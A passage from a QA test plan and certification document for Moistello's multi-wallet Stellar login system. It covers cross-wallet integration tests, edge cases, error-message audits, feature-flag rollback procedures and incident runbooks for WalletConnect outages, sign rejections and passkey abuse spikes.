  Balance fetches are per-wallet, isolated. Rapid switching causes no state corruption.
  No wallet's state leaks into another wallet's entry.

Status: PENDING

INT-003: Sign Cross-Contamination Prevention

Test File: src/lib/wallet/__tests__/cross-adapter-integration.test.ts

Scenario:
  Sign with Wallet A → immediately sign with Wallet B → no cross-contamination

Steps:
  1. Connect freighter and xbull
  2. Sign message with freighter:
     const sigA = await walletStore.signMessage("message for freighter")
     - Verify: freighter's signMessage was called (mock records call)
  3. IMMEDIATELY sign message with xbull (synchronous after freighter):
     const sigB = await walletStore.signMessage("message for xbull")
     - Verify: xbull's signMessage was called (mock records call)
  4. Verify no cross-contamination:
     - sigA contains freighter's mock signature (NOT xbull's)
     - sigB contains xbull's mock signature (NOT freighter's)
     - freighter mock received exactly 1 sign call
     - xbull mock received exactly 1 sign call
  5. Sign transaction with freighter:
     const txA = await freighterAdapter.signTransaction(validXdr)
  6. During freighter sign (async, mock takes 500ms), switch to xbull:
     walletStore.switchWallet("xbull")
  7. Sign transaction with xbull:
     const txB = await xbullAdapter.signTransaction(validXdr)
  8. Verify:
     - txA.signedXdr !== txB.signedXdr (different mock signatures)
     - freighter was NOT used for xbull's sign
     - xbull was NOT used for freighter's sign

Expected Result:
  Each adapter's sign method is called exactly once per respective sign request.
  Signing with Wallet A does not trigger signing with Wallet B.
  Signing is scoped to the active wallet at the time of the call.
  Async sign requests don't cross-contaminate when wallet is switched mid-flight.

Status: PENDING

INT-004: Mid-Transaction Disconnect Graceful Failure

Test File: src/lib/wallet/__tests__/cross-adapter-integration.test.ts

Scenario:
  Wallet A disconnects mid-transaction → transaction gracefully fails → user prompted to reconnect

Steps:
  1. Connect freighter
  2. Initiate signTransaction with freighter (mock delay: 2000ms)
  3. After 500ms (mid-sign), disconnect freighter:
     walletStore.disconnect("freighter")
  4. Wait for signTransaction promise to settle:
     a. Must reject with error (NOT hang forever)
     b. Error code: "internal" with cause indicating session lost
     c. UI state: error field populated on freighter entry (or removed from wallets)
  5. Verify store state:
     a. wallet entry removed or status === "disconnected" with error
     b. activeWalletId is null (no active wallet after disconnect)
     c. isConnected === false
     d. Error message displayed: "Wallet disconnected during signing. Please reconnect and try again."
  6. User clicks "Reconnect" — freighter reconnects successfully:
     walletStore.connect("freighter")
     a. Verify freighter connected with new session
     b. Error state cleared
     c. Ready for new sign attempt

Expected Result:
  Mid-transaction disconnect is handled gracefully. Sign promise rejects with
  descriptive error (not undefined/NaN/crash). UI shows reconnect CTA.
  No orphaned promises, memory leaks, or zombie state.

Status: PENDING

INT-005: Session Survival — Full Lifecycle

Test File: src/lib/wallet/__tests__/cross-adapter-integration.test.ts

Scenario:
  Session survives: page refresh, browser restart, 24-hour sleep, incognito close/reopen

Steps:
  1. Connect freighter and walletconnect
  2. Verify sessions persisted to localStorage (via sessionManager)

  Sub-test A: Page Refresh
  3a. Simulate page refresh: reload jsdom window
  4a. Re-initialize walletStore.init()
  5a. Verify: sessionManager.getAll().length === 2
  6a. Verify: wallets map has both freighter and walletconnect with status "reconnecting"
  7a. Verify: adapter.isConnected() resolves → status transitions to "connected"
  8a. Verify: activeWalletId restored to previously active wallet

  Sub-test B: Browser Restart
  3b. Full jsdom teardown (simulates browser close)
  4b. New jsdom instance (simulates browser reopen)
  5b. localStorage persists across instances (jsdom default)
  6b. Re-initialize walletStore.init()
  7b. Verify: sessions restored from localStorage → wallets reconnecting

  Sub-test C: 24-Hour Sleep
  3c. Simulate: advance system clock by 24 hours (vi.advanceTimersByTime)
  4c. Call sessionManager.getAll()
  5c. Verify: sessions still present (24h < 7d expiry)
  6c. Verify: adapter.isConnected() may fail for WC2 (ping timeout after sleep)
      → status transitions to "disconnected" gracefully

  Sub-test D: Incognito Close/Reopen
  3d. Simulate incognito: clear localStorage
  4d. Re-initialize walletStore.init()
  5d. Verify: sessionManager.getAll().length === 0 (incognito doesn't persist)
  6d. Verify: wallets map is empty
  7d. Verify: isConnected === false, no crash

Expected Result:
  Sessions survive normal browser lifecycle (refresh, restart, sleep).
  Expiry is enforced (7 days → sessions discarded).
  Incognito mode is handled (no persistence, no crash).
  Session restore transitions are visible: reconnecting → connected / disconnected.

Status: PENDING

INT-006: Network Mismatch Detection

Test File: src/lib/wallet/__tests__/cross-adapter-integration.test.ts

Scenario:
  Testnet wallet on mainnet page → warning shown. Mainnet wallet on testnet page → warning shown.

Steps:
  1. Connect freighter on testnet (wallet reports network: "testnet")
  2. Configure app for mainnet (NEXT_PUBLIC_STELLAR_NETWORK=mainnet)
  3. Sign transaction with freighter:
     walletStore.signMessage("test")
     - Adapter detects: wallet.network !== app.network
     - Returns error: { code: "network_mismatch", expected: "mainnet", actual: "testnet" }
     - UI renders: "Your wallet is on Testnet. Moistello is on Mainnet.
                    Switch your wallet network to continue."
  4. Connect walletconnect on mainnet (WC2 reports "stellar:pubnet")
  5. Configure app for testnet
  6. Sign transaction:
     - Returns: { code: "network_mismatch", expected: "testnet", actual: "mainnet" }
     - UI renders appropriate warning for mainnet wallet on testnet page
  7. Connect wallet A (testnet) + wallet B (mainnet) simultaneously
  8. Switch to wallet A → active network is testnet
  9. Switch to wallet B → active network is mainnet
  10. UI shows network indicator per active wallet

Expected Result:
  Network mismatch detection works across all adapter types.
  Error includes both expected and actual network for debugging.
  Multi-wallet state correctly tracks per-wallet network.
  UI shows clear, actionable messaging for each mismatch direction.

5.4 Edge Case Matrix — 20 Scenarios

Phase 1 defined 10 edge cases. Phase 6 re-verifies those 10 AND adds 10 new production edge cases for the multi-wallet system.

Phase 1 Edge Cases (Re-verified):

# Scenario Expected Behavior Phase 1 Status Phase 6 Re-Verify
E-01 Zero-balance wallet connected Wallet connects normally. Balance displayed as "0 XLM". No error thrown. User can still sign auth transactions (non-payment). PENDING PENDING
E-02 Wallet rejects connection (user closes prompt) Error { code: "user_rejected" }. Retry button shown. No crash, no stale state. PENDING PENDING
E-03 Expired session (<7d but stale on server) SessionManager detects ping failure → discards session → prompts reconnect. PENDING PENDING
E-04 Network switch during active sign request Adapter detects network change event → cancels in-flight sign → returns network_mismatch error. PENDING PENDING
E-05 Multiple tabs: connect in Tab A, observe in Tab B BroadcastChannel syncs state. Tab B shows wallet as connected within 100ms. PENDING PENDING
E-06 Browser back button during wallet connection Connection attempt cancelled. User returns to wallet selector. No orphaned pairing. PENDING PENDING
E-07 Slow 3G: sign request takes 55s (within 60s timeout) User sees "Waiting for confirmation..." spinner. Request succeeds within timeout. PENDING PENDING
E-08 Device sleep/wake during active session Session survives sleep. On wake: adapter.isConnected() called → session still valid or re-prompt. PENDING PENDING
E-09 Extension auto-update mid-session Extension updates (new API version). Adapter detects API change → gracefully disconnects → prompts reconnect. PENDING PENDING
E-10 Wallet rejected (user taps "Deny" in wallet app) Error { code: "user_rejected" }. Clear messaging: "You declined the request." Retry option. PENDING PENDING

Phase 6 New Edge Cases (Multi-Wallet Production):

# Scenario Expected Behavior Status
E-11 User with 0 wallets connected (fresh install) WalletSelector shows all adapters with detection status. "Detected" wallets (installed extensions) show at top. "Available" wallets (WC2, passkey) show below. No error, no crash, no blank screen. PENDING
E-12 User with all 5 wallets connected simultaneously WalletSelector shows 5 connected wallet cards. AccountSwitcher dropdown shows 5 entries with balance per wallet. Switching between all 5 works without lag. Disconnecting one doesn't affect the other 4. Memory usage stays within 50KB budget. PENDING
E-13 Slow network (<100kbps) — WC2 relay + Horizon requests WC2 relay connects over slow WebSocket (higher latency but functional). Balance fetches from Horizon take 5-10s. User sees timeout warnings but operations eventually complete. Circuit breaker does NOT trip (slow ≠ down). PENDING
E-14 Browser back/forward navigation during multi-wallet session User navigates back (browser history) while on wallet selector. Forward navigates back to wallet selector. Wallet connections survive navigation. No duplicate connect attempts on return. Session state intact. PENDING
E-15 Tab duplication — connected wallet in both tabs User duplicates tab (Ctrl+Shift+D or "Duplicate tab" context menu). Both tabs share the same session store. Only ONE tab initiates reconnect. Second tab picks up reconnected state via BroadcastChannel. No conflicting connect attempts. PENDING
E-16 Extension auto-update during active session (harder case) Mid-session, Freighter extension updates to v7.0 with breaking API changes. window.freighterApi methods change signatures. Adapter's next call fails with unexpected error → adapter returns { code: "internal" } → UI shows "Wallet update detected. Please reload the page." User refreshes → adapter handles new API version. PENDING
E-17 localStorage full (quota exceeded during session save) SessionManager.save() catches QuotaExceededError. Session works for current tab only (in-memory). Warning logged: "Session not persisted — localStorage full." On next page load, session must be re-established. No crash. PENDING
E-18 Incognito / Private Browsing strict mode localStorage available but cleared on window close. Session works for browsing session but not persisted. On browser restart, user must reconnect. This is expected and documented, not a bug. No error message needed — user chose incognito. PENDING
E-19 Browser without WebAuthn support (e.g., old browser, some embedded WebViews) Passkey adapter's isAvailable() returns false when navigator.credentials is undefined. WalletSelector does NOT show passkey option. Other wallets (extension, WC2) still available. No crash. No error shown to user — they simply don't see passkey as an option. PENDING
E-20 Cross-adapter permission conflict: extension wallet and WC2 both requesting the same Stellar account User connects Freighter (account GABC...). User also connects Lobstr via WC2 (same account GABC...). Multi-wallet store detects duplicate publicKey. Shows warning: "This account is already connected via Freighter. Connecting via WalletConnect will create a duplicate entry." User can proceed — both entries tracked separately with clear labeling (Freighter: GABC... and Lobstr: GABC...). Balance fetches are deduplicated (same account queried once). Signing uses the active wallet's adapter, not the duplicate. PENDING

6. USER EXPERIENCE — ACCESSIBILITY AUDIT

6.1 Flow Documentation — Full Multi-Wallet Auth Flow

Phase 6 does not introduce new flows; it audits the flows built in Phases 1-5 for completeness and correctness.

Metrics from landing to authenticated (Phase 6 audit targets):

  • Clicks from landing to authenticated: ≤3 (select wallet → approve in extension → automatic auth continuation)
  • Time (experienced user, extension already installed): <5 seconds
  • Time (new user installing extension): <60 seconds (guided install → reconnect)
  • Time (WC2 cross-device): 10-15 seconds (as measured in Phase 2 §6.1)
  • Time (passkey, new sign-up): <30 seconds (email entry → biometric → account creation)

6.2 Error UX — Audit of Every User-Facing Message

Phase 6 audits every error path for user-facing message quality:

Error Code Message Shown User Knows What to Do? Escape Hatch Action Required
not_installed "{wallet} is not installed. [Install {wallet} →]" YES — direct link to extension store / app store Select different wallet Install wallet or choose alternative
user_rejected "Connection cancelled. [Try Again]" YES — retry button present Select different wallet Retry or choose alternative
network_mismatch "Your wallet is on {actual}. Moistello is on {expected}. [Switch network in wallet]" YES — explicit instruction + network names Select different wallet Switch wallet network
timeout "Request timed out. Check your wallet app and [Try Again]." YES — suggests checking wallet app Select different wallet Retry or troubleshoot
internal "Something went wrong. Please try again or [Contact Support]." YES — contact support link Refresh page, try different wallet Report if persists
relay_down (WC2 specific) "WalletConnect is temporarily unavailable. Extension wallets still work. [Try Freighter →] [Try xBull →]" YES — alternative wallets suggested Use extension wallet Wait for relay recovery or use extension
session_expired "Your session expired. [Reconnect →]" YES — one-click reconnect Select different wallet Reconnect
storage_corrupted (Silent — session discarded, user prompted to reconnect naturally) YES — reconnect flow triggered Select different wallet Reconnect naturally

Universal escape hatch: The "Select different wallet" option is present in every error state. User can always exit the current flow and choose another adapter. Additionally, the page refresh is a documented recovery mechanism for any unexpected state.

7.2 Feature Flags — Complete Matrix with Rollback Procedures

All feature flags from Phases 1-5 documented with current default, behavior on/off, and rollback procedure.

# Flag Phase Default ON Behavior OFF Behavior Rollback Time
1 NEXT_PUBLIC_FEATURE_MULTI_WALLET Phase 1 true Wallet abstraction layer active. Multi-wallet selector shown. All adapters registered. Old single-Freighter login button. walletRegistry never initialized. <2 min (env var)
2 NEXT_PUBLIC_FEATURE_WALLETCONNECT Phase 2 true WC2 adapter registered. WC2 card in wallet selector. QR/deep link available. WC2 adapter not loaded (tree-shaken). WC2 card hidden. Extension wallets unaffected. <2 min (env var)
3 NEXT_PUBLIC_FEATURE_WALLETCONNECT_DEEPLINK Phase 2 true Deep link used on mobile. QR mode only (even on mobile). <2 min (env var)
4 NEXT_PUBLIC_FEATURE_PASSKEY Phase 3 true Passkey adapter registered. Email/passkey card shown in wallet selector. Passkey adapter not loaded. Passkey card hidden. <2 min (env var)
5 NEXT_PUBLIC_FEATURE_LEDGER Phase 4 true Ledger adapter registered. Ledger card shown in wallet selector. Ledger adapter not loaded. Ledger card hidden. <2 min (env var)
6 NEXT_PUBLIC_FEATURE_MULTI_ACCOUNT Phase 5 true Account switcher shown in navbar. Multiple wallets connectable simultaneously. Single wallet mode. Account switcher hidden. Connecting new wallet disconnects current. <2 min (env var)
7 NEXT_PUBLIC_STELLAR_NETWORK All testnet App targets testnet Horizon. Testnet contract addresses used. N/A (network switch is a separate flag) N/A
8 NEXT_PUBLIC_WC2_PROJECT_ID Phase 2 [REDACTED] WC2 project ID for relay authentication. WC2 disabled (no project ID = no relay access). Requires redeploy

Rollback Procedure (Standardized):

1. Identify the flag to roll back from alert or incident
2. Change flag value in deployment config:
   - Vercel: Environment Variables → set to "false" → Save → Redeploy
   - Cloudflare Pages: Settings → Environment Variables → set to "false" → Save → Redeploy
   - Docker: Update .env.production → docker-compose up -d
3. CDN cache purge (if static assets cached)
4. Verify: access app in incognito → feature is disabled
5. Monitor: error rates return to baseline within 5 minutes
6. Document: incident ticket with rollback reason, time, flag changed
7. Re-enable: after fix deployed → set flag to "true" → redeploy

Target: <5 minutes from alert to rollback complete.

Worst-case scenario (all 5 wallet flags disabled simultaneously):
  App falls back to Phase 0 behavior: single Freighter button (from original codebase).
  This path is maintained and tested as part of the rollback procedure.

7.3 Failure Modes — Complete Runbooks

RUNBOOK-WC-FAILURE: WalletConnect Connection Failure Rate >5%

Severity: P2 (High)
Symptom: >5% of WalletConnect connection attempts fail within 5-minute window.
Primary Metric: wallet_connect_total{adapter="walletconnect"} failure rate

Investigation:
  1. Check walletconnect.com status page — is there a known relay outage?
  2. Check wc2_relay_status gauge — is circuit breaker "degraded" or "down"?
  3. Check wc2_relay_latency_ms — is latency spiking?
  4. Check breakdown by failure code:
     - "timeout" spike → relay latency or wallet responsiveness issue
     - "user_rejected" spike → check if UI is confusing users (new UX issue?)
     - "internal" spike → check adapter error logs for specific cause
  5. Check geographic distribution of failures — regional relay issue?

Mitigation:
  - If relay is down: circuit breaker already shows "down". Extension wallets
    automatically emphasized in UI. No manual action needed for existing users.
  - If geographical: wait for relay provider to resolve (typically <15min).
  - If >5min sustained: consider rolling back WC2 feature flag as last resort
    (NEXT_PUBLIC_FEATURE_WALLETCONNECT=false).

User Impact:
  - New WC2 connections fail → users see "WalletConnect temporarily unavailable.
    Extension wallets still work." with links to Freighter/xBull.
  - Existing WC2 sessions: may still work if relay recovers. Session ping
    may fail → sessions gracefully expire → users reconnect.
  - Non-WC2 wallets: completely unaffected.

Recovery:
  - Circuit breaker auto-recovers when relay healthy (3 consecutive successes
    → "degraded", 5 consecutive → "healthy").
  - No manual intervention typically needed for recovery.

RUNBOOK-SIGN-REJECTION: Sign Rejection Rate >10%

Severity: P3 (Warning)
Symptom: >10% of sign requests are rejected by wallets within 10-minute window.
Primary Metric: wallet_sign_total{outcome="user_rejected"} rate

Investigation:
  1. Check breakdown by adapter — is it all wallets or specific one?
  2. If all wallets affected: check transaction content. Is there a new
     transaction type that wallets don't recognize? Is the XDR malformed?
  3. If specific wallet affected: check that wallet's extension/app version.
     Recent update may have changed signing UX.
  4. Check transaction type: auth nonce signing vs actual transfers.
     If auth signing rejected: users can't log in → escalate to P2.
  5. Check user flow: are users seeing confusing transaction details in wallet?
     Verify the transaction memo/description is clear.
  6. Check for phishing campaign: are users being warned by wallets about
     a suspicious transaction pattern?

Mitigation:
  - If all wallets: halt new sign requests. Investigate XDR content.
    Possible rollback of recent transaction-building code change.
  - If specific wallet: show warning for that wallet adapter ("We're
    investigating issues with {wallet}. Other wallets unaffected.").
  - If auth signing rejected: critical — users can't log in. Escalate.
    Consider disabling new connections for affected adapter.

User Impact:
  - Affected users see: "Signature was declined. Please try again or
    use a different wallet."
  - Transaction details show actual content being signed (transparency).
  - Alternative wallets highlighted if one adapter is affected.

RUNBOOK-RELAY-DOWN: WalletConnect Relay Unreachable

Severity: P2 (High)
Symptom: Circuit breaker status = "down" for >2 minutes.
Primary Metric: wc2_relay_status == "down"

Investigation:
  1. Confirm relay outage: attempt direct connection to wss://relay.walletconnect.com
  2. Check walletconnect.com status page
  3. Check WalletConnect Foundation Twitter/Discord for announcements
  4. Check if outage is partial (some regions) or global

Mitigation:
  - Circuit breaker automatically prevents cascading failures:
    - All WC2 operations short-circuit with relay_down error
    - Users see: "WalletConnect is temporarily unavailable.
      Extension wallets still work."
    - Extension wallet cards are promoted to top of wallet selector
  - If outage exceeds 15 minutes:
    - Consider in-app banner to all users: "WalletConnect is experiencing
      issues. Try Freighter or xBull for immediate access."
    - Social media post: "We're aware WalletConnect is down. Use Freighter
      or xBull browser extensions to access Moistello."
  - If outage exceeds 1 hour:
    - Consider rolling back WC2 feature flag (extreme measure)

User Impact:
  - Mobile-only WC2 users: cannot log in. Directed to install browser extension
    on desktop, or use passkey (if Phase 3 active).
  - Existing WC2 sessions: operations fail gracefully. Users prompted to
    switch to extension wallet.
  - Extension wallet users: NO IMPACT. Completely unaffected.

Recovery:
  - Circuit breaker auto-recovers (3 consecutive successful pings → "degraded",
    5 consecutive → "healthy").
  - Verify: wc2_relay_status returns to "healthy" for >5 minutes.
  - Post-recovery: monitor WC2 connection success rate for 15 minutes.

RUNBOOK-PASSKEY-ABUSE: Unusual Passkey Account Creation Spike

Severity: P3 (Warning)
Symptom: >50 passkey account creations in 5 minutes (abnormal volume).
Primary Metric: rate(passkey_creation_total[5m]) > 50

Investigation:
  1. Check IP distribution: is it single IP or distributed? Single IP = abuse.
  2. Check email patterns: are they random/incremental? (attacker+1@, attacker+2@...)
  3. Check account funding: are accounts being funded? Testnet friendbot rate limits
     should prevent mass creation. Mainnet requires funding partner approval.
  4. Check creation success rate: if very low (most rejected by rate limiter),
     the rate limiter is working as designed.
  5. If rate limiter is NOT catching it: check rate limiter configuration.

Mitigation:
  - Rate limiter should already be active: client-side (Phase 3) + server-side
  - If bypassed: increase rate limit threshold, add CAPTCHA challenge
  - Block abusive IPs at WAF level
  - If mainnet: pause new passkey account funding until attack is mitigated

User Impact:
  - Legitimate users: may experience rate limiting if creating accounts
    during attack. Error: "Account creation temporarily limited. Please try again in a few minutes."
  - Existing passkey users: no impact, can still authenticate.

RUNBOOK-SESSION-DROP: Sudden Drop in Active Sessions

Severity: P3 (Warning)
Symptom: wallet_active_sessions drops >50% in 5 minutes.
Primary Metric: wallet_active_sessions gauge

Investigation:
  1. Check: is this a deployment? New deploy causes all sessions to reconnect.
     Short-term drop is expected (users re-establish sessions within minutes).
  2. Check localStorage corruption rate: wallet_session_restore_total{outcome="corrupted"}
     spike → possible update changed session format without migration.
  3. Check JWT expiry: if auth tokens are expiring en masse, sessions appear "lost"
     because users are redirected to login but wallets are still connected.
  4. Check CDN cache: stale cache serving old wallet layer code that can't
     read new session format?

Mitigation:
  - If deployment-related: expected. Monitor recovery rate. If sessions don't
    recover to previous level within 30 minutes, investigate session restore failures.
  - If localStorage format change: ensure session migration was part of deploy.
    Roll back if migration is failing.
  - If JWT expiry: refresh token logic should auto-renew. Check backend auth service.

User Impact:
  - Users prompted to reconnect (one-click via wallet selector).
  - Session restore shows "reconnecting" state → connects → user continues.
  - Worst case: user manually reconnects (3 clicks: select wallet → approve → done).

Phase 6 Certification Summary:

Phase 6 is the final quality gate. It produces no code — it produces evidence. Every checkbox in this document represents a verification activity that must be executed, measured, and recorded before Moistello's multi-wallet system can be considered production-ready.

The phase covers:

  • 40+ regression tests from Phases 1-5 (must all pass)
  • 6 cross-adapter integration tests (must all pass — no state leaks)
  • 10 penetration tests (must all pass — all mitigations verified)
  • 20 edge cases (must all pass — including new multi-wallet scenarios)
  • 7 performance certifications (must all meet p99 budget)
  • 8 feature flags with rollback procedures (must be verified)
  • 6 accessibility checks (must pass WCAG 2.2 AA)
  • 3 monitoring dashboards (must be deployed)
  • 8 alerts with runbooks (must be configured)
  • 5 production runbooks (must be reviewed)

The estimated execution time for Phase 6 is: 1-2 days if automated tests pass cleanly, 2-4 days if defects are found and require remediation in originating phases.

This document serves as both the test plan and the certification artifact. When every box is checked, the CTO has the evidence needed to approve production deployment.
